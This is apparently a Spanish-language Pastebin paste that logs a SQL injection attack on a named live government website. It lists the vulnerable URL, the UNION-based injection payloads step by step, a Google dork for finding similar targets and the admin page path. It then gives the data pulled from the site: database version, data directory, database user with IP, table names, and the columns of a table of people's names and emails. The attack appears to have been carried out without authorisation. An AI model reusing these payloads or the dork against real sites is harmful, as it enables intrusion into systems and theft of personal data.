Advertisement
jjphyes

Untitled

Feb 19th, 2018
369
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.89 KB | None | 0 0
  1. Datos extraídos mediante SQL Injection:
  2.  
  3. Vulnerabilidad: SQL Injection Simple.
  4. URL Vulnerable: http://inm.go.cr/principal/eventos/verEventos.php?id=66
  5. Sintaxis: order by 5
  6. order by 10
  7. -66 union all select 1,2,3,4,5--
  8. -66 union all select 1,group_concat(version(),0x3a7e,@@datadir,0x3a7e,database(),0x3a7e,user()),3,4,5--
  9. -66 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema = database()--
  10. -66 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name = 0x7065726d69736f5f61646d696e--
  11. -66 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name = 0x6c696e6b--
  12. -66 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name = 0x726567697374726f706572736f6e617320--
  13. -66 union all select 1,concat(nombre,0x3a7e,email,0x3a7e,cod_persona),3,4,5 from registropersonas--
  14.  
  15. Google Dork: site: inm.go.cr & allinurl:php?id or inurl:php?id
  16. Página del administrador: www.inm.go.cr/admin/
  17.  
  18. Versión MySQL: 5.0.96-log
  19. Directorio MySQL: /var/lib/mysql_data/2/
  20. Base de datos: principalinm
  21. Usuario de la base de datos: principalinm@45.40.166.149
  22.  
  23. Tablas de la base de datos:
  24.  
  25. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  26. ~ album ~
  27. ~ beca ~
  28. ~ carrera ~
  29. ~ contacto ~
  30. ~ director_evento ~
  31. ~ docs_formularios_aplicacion ~
  32. ~ docs_formularios_becas ~
  33. ~ docs_patrocinios ~
  34. ~ docs_programas ~
  35. ~ estudio ~
  36. ~ evento ~
  37. ~ fecha_evento ~
  38. ~ fechas_importantes ~
  39. ~ inicio ~
  40. ~ institucion ~
  41. ~ link ~
  42. ~ menu1 ~
  43. ~ menu2 ~
  44. ~ menu3 ~
  45. ~ patrocinador ~
  46. ~ patrocinio ~
  47. ~ permiso_admin ~
  48. ~ programa ~
  49. ~ programa_patrocinio ~
  50. ~ registropersonas ~
  51. ~ repertorio ~
  52. ~ solista ~
  53. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  54.  
  55. En total son 27 tablas.
  56.  
  57. Columnas de la tabla registropersonas:
  58.  
  59. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  60. ~ cod_persona ~
  61. ~ nombre ~
  62. ~ 1_apellido ~
  63. ~ 2_apellido ~
  64. ~ sexo ~
  65. ~ email ~
  66. ~ estado ~
  67. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  68.  
  69. En total son 7 columnas.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement